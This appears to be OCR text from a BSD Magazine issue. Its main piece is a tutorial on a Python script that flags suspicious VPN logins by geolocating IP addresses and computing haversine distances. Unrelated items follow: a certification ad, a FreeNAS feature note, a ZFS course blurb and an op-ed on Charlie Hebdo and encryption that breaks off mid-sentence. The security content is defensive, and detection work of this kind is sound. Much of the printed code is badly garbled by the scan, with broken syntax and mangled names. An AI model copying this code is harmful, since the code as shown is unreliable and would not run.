Python code gains access to the functionality provided 
by one module through the process of importing the mod- 
ule. The import statement, as seen, here is the most com- 
mon way of invoking the import functionality. 

Let us go through each of the modules that we are im- 
porting: 


¢ The argparse module is used to create command-line 
interfaces for your script like: 


python yourporgramname.py arguments 
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This module automatically defines what arguments it re- 
quires, generates help and usage messages, and issues 
errors when a user gives the program invalid arguments. 
We will use this module to accept arguments from our 
command line, such as the name of the VPN log file that 
we are going to process. 


¢ The re module provides regular expression support 
to Python programs. A regular expression specifies 
a set of strings that matches it. Basically the functions 
in this module allow you to check if there are particu- 
lar string matches that correspond to the given regu- 
lar expression. If you have limited exposure to regular 
expressions, there is a good amount of reference ma- 
terial available from the Web. Since our VPN logs are 
mostly unstructured text, we will be using this mod- 
ule to parse the events in our VPN logs to produce 
a more structured data set. 

¢ The csv module provides support and various func- 
tionalities for reading, writing, and manipulating CSV 
or “comma separated values.” The CSV format is 
probably the most common import and export format 
for spreadsheets and databases. It should be not- 
ed though that there is no standard CSV format, so 
it can vary from application to application. There are 
CSV files where delimiters are not even commas — 
they can be spaces, tabs, semicolons (;), carets (4), 
or pipes (|). The overall format is similar enough for 
this module to read and write tabular data. We will 
be using this module in our scenario to process VPN 
logs formatted using CSV and we will produce the re- 
sults in the same format, as well. 

¢ The math module provides access to the mathemati- 
cal functions defined by the C standard. We need the 
math module for the computations we will be doing in 
the script, particularly when we use the haversine dis- 
tance formula. 

¢ The datetime module supplies classes for manipu- 
lating dates and times, in both simple and complex 
ways. While date and time arithmetic is supported, 
the focus of this implementation is on efficient attri- 
bute extraction for output formatting and manipula- 
tion. For related functionalities, see the time and cal- 
endar modules. 


# requires maxmind geoip database and library 
# http://dev.maxmind.com/geoip/legacy/install/city/ 


import GeoIP 


We will also be using a third-party module called GeolP 
for our program. This is the MaxMind’s GeolP module, 
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which will enable our program to identify the geographic 
information from an IP address. Most importantly, we are 
concerned with the latitude and longitude for our haver- 
sine distance computation, but it also allows us to iden- 
tify the location, organization, and connection speed. 
MaxMind’s GeolP module is one of the more popular ge- 
olocation databases. More information can be seen in 
this link: http:/dev.maxmind.com/geoip/geoip2/geolite2/. 

For our scenario, we will be using the GeoLite 2 data- 
base, which is a free geolocation database also from Max- 
Mind. It is comparable, but it is less accurate than the com- 
pany’s premier product, which is the GeolP2 database. 

To get started with MaxMind GeolP, go through this link 
and install it into your system: http://dev.maxmind.com/ 
geoip/legacy/install/city/. 

The link above provides a brief outline of the steps 
needed to install GeolP City on Linux or Unix systems. 
The installation on Windows is similar: You will just need 
to use WinZip or a similar ZIP program. The outline pro- 
vides the following steps: 


¢ Download database 
¢ Install database 
¢ Query database 
Program Flow 
def main(): 
" Main program function ~”” 


args = parse args () 


# read report 


header, rows = read csv (args.report) 


# normalize event data 


events = normalize(header, rows) 
# perform analytics events = analyze(events) 
# write output write csv(args.out, events) 


if name == * main ’: 


main () 


Read 
Arguments 


Read Logs 


Figure 2. The remote access Python analytics program flow 


BSD 


MAGAZINE 


30 


Normalize 
Data 


The main function provides the flow of the actual pro- 
gram. The diagram below illustrates how the program 
will work (Figure 2). 

The flow is fairly straightforward, since it is a very simple 
program. Here is an additional description of the overall 
program flow. 


¢ The program will read and parse the command-line 
argument. This is how the program knows which VPN 
log it will need to process. 

¢ Once the name of the file has been passed through 
the argument, the program will then read the file. 

¢ While reading the file, the program will start normal- 
izing the contents of the VPN logs. This means that 
the data are converted to the format that will be more 
conducive for processing. 

¢ Once the data are normalized, the program will then 
run the analysis which in this case consists of GeolP 
processing, which includes identifying the latitude 
and longitude, as well as the computation for the ha- 
versine distance. 

¢ Finally, we will generate the report that will show the 
accounts that have the highest haversine distance. 


In the subsequent sections, we will go through a more 
detailed review of each process and code snippets one- 
by-one. 


Parse the Arguments 
Let us go through the code that reads and parses the 
command-line argument. We parse the arguments using 
the “call” from the main. 


args = parse args () 
The function we are calling is called parse args(): 


def parse-args(): 
# parse commandline options 
parser = argparse.ArgumentParser () 
parser.add argument (‘report”, 
type=argparse.FileType(‘rb’), 


help=’csv report to parse’) 


Analyze Generate 


Data 


Report 
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parser,add argument ("0") “--out’, default="out.ceyv’ ; 
type=argparse.FileType(‘w’), 
help='csv report output file’) 


return Parser sparse args () 


Basically, this code snippet allows the program to be able 
to take a command-line argument. In our case, there are 
two arguments that we would like to be able to pass: 


¢ The name of the VPN log file that we would like to 
process. 

¢ The name of the output file where the results will be 
written. 


The important part here, in the code, is the parser.add.argu- 
ment method. You will notice that we have two statements 
corresponding to the two arguments we need to take. 

Overall, this would allow us to issue a command in the 
following manner: 


pylhon analyze.py von.csv -—o outscsv 


You will also see that the “—o” is not required, because 
it will default to “out.csv,” as you will see in the second 
“add.argument” statement in the program. 


Read the VPN Logs 

Let us go through the code that reads the file that is con- 
taining the VPN logs. This is done through the following 
statements in main: 


# read report 
neadéer, rows. = fredd csv (args.report) 
The function ‘that 16 called read csv {): 
def read csv (file): 
” Reads a CSV file and returns the header and rows “”” 
with file: 
reader = csv.reader (file) 
header = reader.next () 
rows = list (reader) 


return header, rows 


This snippet of code allows the program to read the CSV 
file. Here are the various processes the code implements: 


¢ A CSV object called “reader” is created. This uses the 
CSV module that was imported previously. The CSV 
module provides methods to manipulate tabular data. 

e The reader object iterates over the lines in the given 
CSV file. Each row read from the CSV file is returned 
as a list of strings. 
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The BSD Certification Group Inc. 
(BSDCG) is a non-profit organization 
committed to creating and 
maintaining a global certification 
standard for system administration 
on BSD based operating systems. 


@ WHAT CERTIFICATIONS ARE AVAILABLE? 


BSDA: Entry-level certification suited for candidates 
with a general Unix background and at least six months of 
experience with BSD systems. 


BSDP: Advanced certification for senior system administrators 
with at least three years of experience on BSD systems. 
Successful BSDP candidates are able to demonstrate 

strong to expert skills in BSD Unix system administration. 


@ WHERE CAN | GET CERTIFIED? 


We'’re pleased to announce that after 7 months of 
negotiations and the work required to make the exam 
available in a computer based format, that the BSDA 
exam is now available at several hundred testing centers 
around the world. Paper based BSDA exams cost $75 USD. 
Computer based BSDA exams cost $150 USD. The price of 
the BSDP exams are yet to be determined. 


Payments are made through our registration website: 
https://register.bsdcertification.org//register/payment 


@ WHERE CAN I GET MORE INFORMATION? 


More information and links to our mailing lists, LinkedIn 
groups, and Facebook group are available at our website: 
http://www.bsdcertification.org 


Registration for upcoming exam events is available at our 
registration website: 
https://register.bsdcertification.org//register/get-a-bsdcq-id 
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¢ Since the first row of our data file contains a header 
(the title of the rows), the program iterates to the first 
line and gets the header information. This is stored in 
the “header” variable. 

¢ The contents of the file or the logs itself are then 
loaded into the “rows” variable. 


At the end of all this, we loaded the entire content of the 
VPN log file into memory and returned it to the program 
for further processing. 


Normalize the Event Data from the VPN logs 

After we have loaded all the data into memory, the next 
step is to normalize the event data. This is done by calling 
the following code from main: 


+ normalize event data 


events = normalize (header, rows) 
The function to normalize data is called normalize(): 


def normalize (header, rows): 
“”“" Normalizes the data ‘“”” 
events = [] 
for row in rows: 
timestamp = row[header.index(‘ReceiveTime’ ) ] 
raw event = row[header.index(‘RawMessage’ ) ] 
event: = Event (raw event) 
event.timestamp = datetime.strptime(timestamp, TIME 
FMT) 
events.append (event) 
return sorted(events, key=lambda x: (x.user, 


x.timestamp) ) 


The code snippet above normalizes the data from the 
VPN logs. We normalize the data because VPN logs, as 
most logs, are typically unstructured text similar to the 
one listed below. 


<164>%ASA-4-722051: Group < VPN GROUP POLICY> 
User < userl> IP <108.178.181.38> Address <10.10.10.10> 


assigned to session 


Typically, if you would want to analyze data, you would 
want to process it so that it can be in a usable format. 
We use the normalize() method to do just that. In our 
case, we would like to structure our data so that we are 
able to separate the data into the following elements: 


e the User ID, 
¢« the external IP address, 
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¢« the internal IP address, and 
¢ date and time. 


Let us go through the code and see what it does: 


¢ The program loads the “Receivelime’ column and 
the “RawMessage. We obtained these columns 
through the reader object via the CSV module. 

e Then, the program processes the timestamp to 
a more usable format. There are certain formats 
that do not work well in manipulating data. In this 
case, the format in our VPN logs, such as “Apr 3, 
2013 2:05:20 PM HST,” is a string conducive to da- 
ta manipulation (e.g., sorting operations). We used 
the datetime.strptime() Class method to convert the 
string to an actual date/time format, allowing us to 
perform date/ time manipulation on the data. 

¢ The program passes the “rawmessage’ to an Event 
object. First let us look at the Event class. The Event 
class looks like the below code: 


class Event (object): 
‘““" Basic event class for handling log events “”” 
ilies = 1] 
rules.append (Rule (“ASA=4-722051", 
_ftules..append (Rule (*ASA=5-722037", 


DISCONNECT) ) 


*‘connect”” , CONNECT) } 


“disconnect” , 


der init {(selt; raw event): 
for rule im self. rules: 
1f rule.kéy in raw event: 
Selis Match rule(rule, Paw event) 


self.key = rule.title 


det .match tule(selt, tule, taw event): 
match = rube.regex.match (raw event) 
for key, value in match.groupdict().iteritems(): 


setattr(self, key, value) 


def str (self): 


return str(self. dict ) 


def repr (self): 


return repr(self. dict ) 


The Event class then utilizes the Rule class, which looks 
like the following: 


class Rule(object): 


“"“" Basic rule object class 


def init (self, key, title, regex): 
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self.key = key self.title = title 


self.regex = re.compile (regex) 


¢ What do the Event and Rule classes do? Basically, 
these functions are used to parse the VPN logs in- 
to “structured” events. This is done via the “Rules” 
class that uses regular expressions to break down 
the string. For example, “connect” events in the VPN 
logs are parsed using this command: 


CONNECT = (2 .>> User <(7P<iser>.*)> LP< (2 P<externals,*)> ~ 


r’Address <(?P<internal>.*)> assigned to session’ ) 


¢ If you look at the command above, using the regular 
expression inside the CONNECT variable, the pro- 
gram will be able to extract the user, the external IP, 
and internal IP information from the raw message of 
the VPN log. 

¢ Finally, once we have parsed and normalized all the 
needed information, we sort the events based on us- 
ers and timestamp. By doing this, we will be able to 
compare the following: 
¢ when and where the user is currently logged in, and 
e when and where the user previously logged in be- 

fore the current login. 


The reason for this will be more readily apparent as we 
go through the analysis of the data. 


Run the Analytics 


def analyze(events): 

‘“"" Main event analysis loops ‘“”” 
gi = GeoIPopen(GEOIP DB, GeoIP.GEOIP STANDARD) 
for i, event in enumerate (events): 


# calculate the geoip information if event.external: 


record = g1.,record by addr (event.external) 
events [1] .geo1p ce = record ‘country code” | 
events [1)sqe01p lat = record|* latitude’ |] 
events [1.) <géo1p long = record[* longitude’ | 


# calculate the haversine distance if i > 0: 
if events[i].user == events[i-1l].user: 
origin = (events [i—Li«egeoip tat, 
events [i=l] sgeo01p Jong) 
destination = (events [1).geo1p lat, 
events[i].geoip long) 
events[i].haversine = distance(origin, 
destination) 
else: 
events[i].haversine = 0.0 


else: 
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events[i].haversine = 0.0 


return events 


This is the “meat” of the script we are creating. This is 
where we compute the haversine distance we will be us- 
ing to detect unusual VPN connections. First, we need to 
get the location. We do this by identifying the location of 
the connection and utilizing the MaxMind GeolP API: 


gi = GeoIP.open(GEOIP DB, GeoIP.GEHOIP STANDARD) 
for 1, event in enumerate (events): 
# calculate the geoip information 
if event.external: 
record = g1.record by addr levent.external) 
events [1] .gecip.ce = record | ‘country code” ] 
events (1) .geoip lat = record ‘lati tude” | 


events [1] .gecip long = record | ‘longitude’ | 


Here you see that we create a GeolP object. Then, we 
go through all the events and pass the external IP ad- 
dress (using event.external) to get the following GeolP 
information: 


¢ country code, 
¢ latitude, and 
¢ longitude. 


The latitude and longitude are the essential elements we 
need to compute the haversine distance here: 


# calculate the haversine distance 
Lt a. >: 
if events[i].user == events[i-l].user: 
Ofigin = (events [i-l].geoip lat, events [i-l].«geo1p: 
long) 
destination =“(events(1].ge01p lac, 
events[i].geoip long) events[i].haversine = 
distance(origin, destination) 
else: 
events[i].haversine = 0.0 
else: 


events[i].haversine = 0.0 


We compare before and after connections for one user in this 
section. Here is the pseudocode on how the code operates: 


¢ Is the previous event from the same user? 
¢ If yes, then: 
¢ Where did the user’s current connection come from? 
¢ Where did the connection before this current one 
come from? 
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¢ Compute for the haversine distance 
° If no, then: a = math.sin(dlat/2) 
¢ Zero out the haversine computation. 


dlon = math.radians(lon2-lonl1) 
* math.sin(dlat/2) + 

math.cos(math.radians(latl)) \ 
* math.cos(math.radians(lat2)) * math.sin(dlon/2) * 
Pretty simple, is it not? So now, how is the haversine dis- math. sin(dlon/2) 
tance computed? The distance method in the code is used: c = 2 * math.atan2(math.sqrt (a), math.sqrt(l-a)) 

d = radius * c return d 

def distance(origin, destination): 
This is a little bit hard to explain without teaching you 
https://gist.github.com/rochacbruno/2883505</u> math, so we will not be covering these details in this book. 
seu The important thing for you to know about the code here 
is the technique we are using and we know how to use 
Google! 


“"" Haversine distance calculation 


latl, lonl = origin 

lat2, lon2 = destination 
radius = 6371 # km 

dlat = math.radians(lat2-latl) 


timestamp yiuser | ¥ external yireason |») geoip_cc |¥| geoip_lat| | geoip_lon ¥| haversine ¥ | 
4/3/13 9:12 userl 67.53.40.236 US 21.3209 -157.8389 0 
4/3/139:15 userl 67.53.40.236 User Reques' US 21.3209 -15/7.8389 0 
4/3/13 9:47 userl 67.53.40.236 US 21.3209 -157.8389 0 
4/3/13 9:49 userl 67.53.40.236 User Reques US 21.3209 -157.8389 0 
4/1/13 16:43 user2 772.234.151.233 US 19.4601002 -155.0246 0 
4/1/13 18:17 user2 72.234,151.233 User Reques’ US 19.4601002 -155.0246 0 
4/1/13 20:49 user2 72.234,151.233 US 19.4601002 -155.0246 0 
4/1/13 22:46 user2 72.234.151.233 User Reques' US 19.4601002 -155.0246 0 
4/2/13 23:22 user3 75.85.132.182 US 21.4701004 -157.9637 0 
4/3/13 1:56 user3 75,85.132.182 DPD failure. US 21.4701004 -15/7.9637 0 
4/3/13 1:57 user3 75,85.132.182 DPO failure. US 21.4701004 -15/7.9637 0 
3/30/13 23:40 user4 50.113.7.155 US 21.3421993 -157.8374 0 
3/31/13 0:42 user4 §0.113.7.155 User Reques’ US 21.3421993 -15/.8374 0 
4/1/13 10:40 user4 50.113.7.155 US 21.3421993 -157.8374 0 
4/1/13 12:27 user4 90,113.7.155 User Reques' US 21.3421993 -157.8374 0 
3/27/13 16:27 user 12.226.166.178 US 33.2229996 -117.1069 0 
3/27/13 16:45 user5 123.226.166.178 User Reques' US 33.2229996 -117.1069 0 
3/28/13 18:43 users 12.226.166.178 US 33.2229996 -117.1069 0 
3/28/13 19:26 user5 12.226.166.178 User Reques’ US 33.2229996 -117.1069 0 
3/31/13 17:30 users 12.226.166.178 US 33.2229996 -11/7.1069 0 
3/31/13 17:40 user 12.226.166.178 User Reques' US 33.2229996 -117.1069 0 
3/27/13 16:03 user6 70.199.227.232 US 45.5233994 -122.6762 0 
3/28/13 10:39 user6 70,199,227 .232 Transport cle US 45.5233994 -122.6762 0 
3/28/13 14:08 user6 70.199,224.111 US 45.5233994 -122.6762 0 
3/28/13 16:20 user6 70.199.224.111 Transport clc US 45.5233994 -122.6762 0 
4/3/13 9:09 user6 70.199.228.226 US 45.5233994 -122.6762 0 
3/27/13 22:21 user7 76.88.137.124 US 21.3267002 -157.8167 0 
3/28/13 1:08 user? 76.88.137.124 US 21.3267002 -157.8167 0 
3/28/13 2:23 user7 76.88.137.124 Transport clc US 21.3267002 ~-157.8167 0 
3/28/13 22:16 user’ 76.93.194.140 US 21.3775005 -158.0862 0 
3/28/13 22:46 users 76.93.194.140 User Reques US 21.3775005 -158.0862 0 
3/29/13 19:07 user8 24,43.224.194 US 24.8598003 -168.0218 1086.93909 
3/29/13 20:02 user8 24,43.224.194 DPD failure. US 24.8598003 -168.0218 0 
3/29/13 20:04 user8 24.43.224.194 DPD failure. US 24.8598003 -168.0218 0 
3/31/13 19:23 users 76.93.194.140 US 21.3775005 -158.0862 1086.93909 
3/31/13 22:21 users 76,93.194.140 Transport cle US 21.3775005  -158.0862 0 
3/28/13 10:38 user9 98.150.159.172 US 21.2982998 -15/.7919 0 
3/28/13 12:26 user9 98.150.159.172 User Reques' US 21.2982998 -157.7919 0 
3/29/13 8:56 user9 968.150.159.172 US 21.2982998 -157.7919 0 
3/29/13 13:41 user9 968.150.159.172 User Reques' US 21.2982998 -157.7919 0 
3/29/13 15:04 user9 98.150.159.172 US 21.2982998 -15/./919 0 


Figure 3. Sample output of the remote access script 
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The program will run the analytics we discussed in 
the previous section 

The program will then write the results in a file called 
out.csv file 


In this case, a simple search for “Havesine Python” 
would lead you to a ton of resources. We are crediting 
Waybe Dyck for a piece of code made available in Github~ 
for the haversine calculation. And, that is the code we will 
be using! It is now time to run it and analyze the results. 

Let us open up the vpn.csv file in a spreadsheet and look 
at the results. The results should look like something 
similar to the following (Figure 3): 

The important information here is the last column, con- 
taining the haversine distance. This should be the focus of 
your review. We want to look for the larger haversine dis- 
tance because it means the locations between the logins 
are greater. Therefore, the greater the haversine distance, 
the more suspicious it is. 


ANALYZING THE RESULTS 

To run the code, all you really need to do is to type in the 
following command: 

python analyze.py vpn.csv -o out.csv 


When the program is run, it will do the following: 


¢ Load the VPN log information from vpn.csv 


3/28/13 2:23 user7 76.88.137.124 Transport cle US 21.3267002 -157.8167 0 
3/28/13 22:16 users 76,93,194.140 US 21.3775005 -158.0862 0 
3/28/13 22:46 users 76.93.194.140 User Reques US 21.3775005 -158.0862 0 
3/29/13 19:07 user8 24.43.224.194 US 24.8598003 -168.0218 1086.93909 
3/29/13 20:02 user8 24.43.224.194 DPD failure. US 24.8598003 -168.0218 0 
3/29/13 20:04 users 24.43 .224.194 DPD failure. US 24.8598003 -168,0218 0 
3/31/13 19:23 users 76.93.194.140 US 21.3775005 -158.0862 1086.93909 
2/24/9123 °99-91 incor 7h 03 704 14 Tranennert clr 11% 341 377505 -158 M8AD fi 

Figure 4. Reviewing the access behavior of User8 
4/1/13 22:15 user90 76.93.217.150 US 21.3267002 -157.8167 2.3884208 
4/1/13 22:53 user90 76.93.217.150 US 21.3267002 -157.8167 0 
4/2/13 11:26 user90 66.175.72.33 US 21.3209 -157.8389 2,.3884208 
4/2/13 12:10 user90 66.175.72.33 US 21.3209  -157.8389 0 
4/2/13 13:05 user90 108.178.181.38 US 21.3136005 -157.80569 3.53389091 
4/2/13 13:56 user90 108.178.181.38 US 21.3136005 -157.80569 0 


66.175.72.33 
64.134.237.89 
66.175.72.33 
64.134.237.89 
66.175.72.33 


4/2/13 15:48 user90 
4/2/13 16:06 user90 


4/2/13 16:59 user90 
4/2/13 17:15 user90 
4/3/13 9:17 user90 


21.3209 
34.0522003 
21.3209 
34.0522003 
21.3209 


“157.8389 
-118.2437 
-157.8389 
~118.2437 
-157.8389 


4117.41858 
4117.41858 
4117.41858 


4/3/13 10:42 user90 66.175.72.33 US 21.3209 -157.8389 0 
4/3/13 12:33 user90 66.175.72.33 US 21.3209 -157.8389 0 
4/3/13 13:28 user90 66.175.72.33 US 21.3209 -157.8389 0 
4/3/13 14:05 user90 108.178.181.38 US 21.3136005 -157.80569 3.53389091 
Figure 5. Reviewing the access behavior of User90 
4/1/13 11:16 user91 66.175.72.33 US 21.3209 -157.8389 0 
4/1/13 11:48 user91 66.175.72.33 US 21.3209 -157.8389 0 
4/1/13 21:23 user91 72.235.23.189 US 21.3469009 -158.0183 18.804763 
4/2/13 9:08 user91 72.235.23.189 US 21.3469009 -158.0183 0 
4/2/13 9:09 user91 72.235.23.189 US 21.3469009 -158.0183 0 
4/2/13 17:09 user91 72.235.23.189 US —21.3469009 -158.0183 0 
4/3/13 6:29 user91 72.235.23.189 US 21.3469009 -158.0183 0 
4/3/13 10:20 user91 198.23.71.73 US 32.9299011 -96.835297 6106.99523 
4/3/13 10:20 user91 198.23.71.73 US 32.9299011 -96.835297 0 
4/3/13 11:21 user91 198.23.71.73 US 32.9299011 -96.835297 0 
21.3209 ~-157.8389 6091.5666 


4/3/13 13:45 user91 
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Figure 6. Reviewing the access behavior of User91 
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Let us go through some examples to make it clearer. First 
off, here are some quick guidelines in doing the review: 


¢ Disregard haversine distances that are 0. 

¢ Look for haversine distances that are large (e.g., 
greater that 1000). This is generally up to your discre- 
tion, but most of it is common sense. For example, let 
us look at “user8” (Figure 4): 


User8 has a fairly large haversine distance. If you do 
a GeolP lookup, for example, using htto:/www.geoiptool. 
com, it shows that the connections are coming from the 
same state (Hawaii) but in different towns. You can also 
see that the date is one day apart, so it is not as suspli- 
cious at it seems. But, based on your level of tolerance, 
you can develop a policy to call and verify if a user’s log- 
in was valid for that day. 


e Let us look for larger haversine distances in the list. 
You will see some that are fairly large such as this 
one for “user90.” (Figure 5) 


There are several fairly large haversine distances here. 
lf you use a GeolP locator, you will be able to piece to- 
gether the connection behavior of this user: 


¢ 64.134.237.89 (Hawaii) 
¢ 66.175.72.33 (California) 
¢ 64.134.237.89 (Hawaii) 
¢ 66.175.72.33 (California) 


Note that this is in the span of one day. Actually, the first 
three logins were in the span of a couple of hours. This is 
obviously something worth investigating and, at the very 
least, having a security officer question user90 about 
these logins. Of course, this does not automatically mean 
that the connections are malicious. There could be valid 
reasons causing a user to connect through remote ma- 
chines. In any case, this is something worth investigating. 

Let us look another one (Figure 6). This one has an even 
bigger haversine distance: If we investigate this further, we 
see this connection behavior in the span of one day: 


© 72.235.23.189 (Hawaii) 
© 198.23.71.73 (Texas) 

¢ 198.23.71.73 (Texas) 

¢ 198.23.71.73 (Texas) 

¢ 66.175.72.33 (Hawaii) 


As we already discussed, since these connections hap- 
pened in a span of a few hours, this is not an absolute 
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indication of a malicious connection. Plausible reasons 
for these types of connections include the following: 


e The user is connecting through a remote machine. 

¢ The user is using some sort of proxy or mobile service. 

¢ Some users are sharing accounts. 

e The account is compromised and a malicious user is 
connecting as the user. 


In any of these scenarios, it is worthwhile to verify if 
these are valid connections. Ultimately, this type of re- 
view can be incorporated as a regular remote access re- 
view program, whereby the goal is to identify potentially 
malicious remote connections. Aside from checking for 
haversine distances, you could use the script as a foun- 
dation for creating other analysis methods to identify oth- 
er misuse of remote access connections. You could con- 
sider expanding your script by including the following: 


* concurrent connection of the same user, 

¢ concurrent users, 

* connection between two times, 

* connections from certain countries, 

* connections greater than x amounts per day, 

¢ user connects in unusual times, 

¢* user connects from unusual locations, 

¢ the frequency of connections, and many more... 


The principles discussed here can also be applied to 
other data sets. For example, this technique can be uti- 
lized for examining server or database access logs. 
The scripts can be easily tweaked to review physical ac- 
cess logs, as well such for identifying physical access in- 
to facilities at unusual times or frequencies. 
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FreeNAS 9.3 
Features - Support 
for VMware VAAI 


new update manager and the decision to completely move to ZFS), it’s easy to over- 

look some of the other features that were added during the release. One of those 
features we'd like to highlight was the added support for coherent VMware snapshots so ZFS 
snapshots and VMware snapshots are properly coordinated. 


VV ith all the excitement over the big changes introduced in FreeNAS 9.3 (including the 


iXsystems worked with FreeBSD developers to add additional VMware VAAI primitives to the 
ISCSI protocol in FreeBSD. This feature was then brought over to FreeNAS and as a result, 
FreeNAS 9.3 now fully supports the following VAAI block and thin provisioning primitives: 


¢ Write Same Zero — Repetitive write operations are performed by FreeNAS 

¢ Xcopy (Full Copy) — FreeNAS will mass copy blocks 

¢« Atomic Test and Set — FreeNAS does not lock a full LUN allowing other VMs on that LUN 
to run 

¢ UNMAP —A thin provisioning API that ensures that FreeNAS never uses more space 
than needed 

¢ Warn & Stun — Another thin provisioning operation that ensures that VMs don’t encoun- 
ter an out-of-space condition or crash. You can address the out-of-space issue in FreeNAS 
and then restart affected VMs. 


Also, FreeNAS tells VMware that it is thinly provisioned and will create ZFS snapshots to re- 
place the VMware snapshots. 


These features enable FreeNAS to integrate better with VMware deployments. These changes 
will also be implemented in an upcoming TrueNAS release, making it easier for our customers 


to use TrueNAS to back virtualization environments. 


For more information about VAAI, check out the VMware site. 
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Using FreeBSD as a file Server with ZFS 


Ivan Voras 


The ZFS storage workshop will teach you how to create a ZFS file system from scratch and build a file server on top 
of it, but it will also teach you how ZFS, file systems and storage servers work in general. You will learn what ZFS 
looks like, its many features and quirks, and how to use it in a FreeBSD server as a building block of a small file 
server. 


ZFS is the ground-breaking file system originally developed at Sun Inc. for their Solaris operating system. It was 
open-sourced as a part of their OpenSolaris initiative and from there has spread to multiple other operating systems. 
FreeBSD was the first one to implement a working port, and though it has taken a fairly long time of tweaking and 
stabilization, it is now a robust and popular choice. There are products which successfully build upon the technolo- 
gies of FreeBSD and ZFS, such as FreeNAS and its related enterprise-class products from iXsystems, which au- 
tomate and simplify a lot of the tasks, but all of them use the same ZFS interface under the hood, which is not that 
complicated in itself. 


The requirements for this workshop are decent knowledge of FreeBSD, a basic familiarity with command-line op- 
erations, and a system (possibly a virtual machine) on which the student will perform the required tasks, containing 
at least four hard drives (physical or virtual). Since the topic of this workshop is file servers, the participants must 
prepare a virtual or a physical machine with at least two disk drives (and preferably 4), which which to perform the 
exercises and the setup from the workshop. 


http://osdmag.org/course/using-freebsd-as-a-file-server-with-zfs-2/ 


Ivan Voras is a FreeBSD developer and a long-time user, starting with FreeBSD 4.3 and throughout all the versions since. 
In real life he is a researcher, system administrator and a developer, as opportunity presents itself, with a wide range of 
experience from hardware hacking to cloud computing. He is currently employed at the University of Zagreb Faculty of 
Electrical Engineering and Eomputing and lives in Zagreb, Croatia. You can follow him on his blog in English at http:// 
ivoras.net/blog or in Croatian at http://hrblog.ivoras.net/, as well as Google+ at https://plus.google.com/+IvanVoras. 


Our courses are available online in Premium Membership. 
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With the recent deaths from the Charlie 
Hebdo terrorist attack in Paris, what 

implications does this tragic event have 
for freedom of speech not only for print 
journalists but the Internet community 


at large? 


sent a visceral shock-wave through both secular 

and religious communities in Europe quite unlike 
anything since the terrorist atrocities in London and Ma- 
drid of some years ago. While those attacks were horrific 
enough, the Charlie Hebdo incident sunk to new depths 
in that the principle of freedom of expression itself was di- 
rectly targeted — in so much as innocent cartoonists and 
editorial staff were murdered in cold blood in a major Euro- 
pean capital. These form of tactics are not new. The Com- 
mittee to Protect Journalists reports that 1110 journalists 
have been killed while carrying out their work since 1992, 
the majority being deliberately targeted and not killed due 
to crossfire in war zones. What is new, however, is that 
the fight — not just physically but ethically — has moved 
from the protagonists territory to the West. This is clear- 
ly been demonstrated in the reticence of certain publica- 
tions refusing to carry the cartoons from Charlie Hebdo 
for fear of causing further offense or potential reprisals, 
while parroting the mantra “Of course we believe in free- 
dom of speech but ...”. | Know if | was a magazine editor, 
| would find myself in a very difficult position. Publish and 
be damned or take the diplomatic route of appeasement? 
What is clear though, is that all types of media will need to 
perform a lot of soul-searching as to how far they are will- 
ing to push the boundaries from now on. 


Ty he events which occurred in January in Paris have 


The context surrounding Charlie Hebdo is quite unique 
in many ways. Satire is a very powerful weapon and is an 
ideal vehicle for puncturing inflated egos, exposing bla- 
tant hypocrisy and shining a spotlight in the darker cor- 
ners of society where absurdities, injustice and inequality 
hide. A cartoonist can achieve more in a few square centi- 
meters than most skilled authors can with an 8 point font. 
While this is the bread and butter of Charlie Hebdo, the 
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magazine itself — not known for tact, subtlety or sensitivi- 
ties — hit out at every section of the establishment both po- 
litical and religious and not just Islam. Both Christians and 
Jews have suffered the wrath of the French cartoonists’ 
pen. Born out of the publication Hara-Kiri which, ironically 
for a secular society, was banned in 1970 after mocking 
the death of president Charles de Gaulle. The tone has al- 
ways been defiant and unequivocal. The phrase “sacred 
cows make the best hamburgers” was made for them. 


From this secular position, conflict was inevitable. France 
has always stood for intellectual freedom, the separation 
of Church and State being one of the cornerstones. The 
extremists that carried out this act held this moral position 
in such utter contempt that not only did they slaughter jour- 
nalists, but police and civilians as well. Any attempt to gain 
sympathy for their position or a fair hearing is now utterly 
eclipsed by the wickedness of their deed. It is no wonder 
that there has been an increase in tension, with all sides 
rushing to batten down the hatches in an increasing spiral 
of paranoia and division. As usual, it is the innocent that will 
suffer, and as always a small minority of troublemakers will 
capitalize, exploit and politicize this for their own agenda. 


Looking at this rationally, if | were to examine the odds, 
the chances of being killed by a terrorist is probably one in 
a few million. | have a better chance of being killed in a car 
accident or suffering a fatal heart attack. The Charlie Heb- 
do team knew the risks, and police protection was pres- 
ent. Unlike the others victims who were killed, ultimately it 
was their choice to take this particular editorial and ethical 
stance. That is why this outrage is so poignant. Freedom 
of speech is not cheap. Sometimes you will offend some- 
one. It takes guts to stand on your beliefs knowing you will 
be criticised, pilloried or potentially killed. 
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So what has this got to do with Internet freedoms and 
journalism? As predicted, knees have been spasmodical- 
ly jerking everywhere about the need to increase secu- 
rity, more powers are needed, less freedom etc. It is be- 
ing mooted that more legislation will be required to allow 
agencies to decrypt encrypted traffic. This is bringing us 
close to the position where encryption itself will be close 
to worthless, as some unaccountable agency will be able 
to intercept and decode “secure” communications — that 
is if it is not being done already under the table. Any crimi- 
nal or terrorist worth his salt will know the importance of 
encryption so this begs the question how many encrypted 
communications are already being decrypted? All these 
plots that the Intelligence services keep foiling cannot just 
be based on surveillance — to start with this is manpower 
intensive and risky. Whistle-blowers or informers? Possi- 
bly. But any strategist will tell you that without the former 
signals intelligence is the most vital asset — but it comes 
at a price. You need context, the big picture. As the old 
saying goes, the intelligence services need to be lucky all 
of the time, the terrorists only once. Ultimately, encryption 
serves two purposes — To keep the bad guys out or to hide 
something from the good guys. So while | can appreciate 
the dilemma, and have every sympathy with the difficult 
job the Intelligence services have to carry out, what con- 
cerns me most is the old mantra “If you’ve got nothing to 
hide, you've got nothing to fear” argument. Or to put it an- 
other way in Latin: Quis custodiet ipsos custodes — Who 
watches the watchers? The argument goes back to Plato, 
yet we still have not managed to find a satisfactory resolu- 
tion to this problem. Police states depend upon the collu- 
sion of the populace, and when you add technology to the 
mix you are heading towards dangerously thin ice. | do not 
look forward living in a society where opinions, beliefs or 
even visiting certain websites makes me a potential sub- 
versive. To some this will be a balanced and fair article, 
to others | will be public enemy number 1. That is taken 
as read. But if | am going to be judged, I'd like to know by 
who and by what criteria you are judging me. 


As a society, have we not matured enough where books 
or access to information don’t need to be locked away as 
they are too dangerous for the masses? This is middle 
ages — not 21* century thinking. In this respect, encryption 
has overplayed its hand — those now using encryption are 
more “Suspicious”. | see us getting to the point that you 
will need to have a license and a very good reason to use 
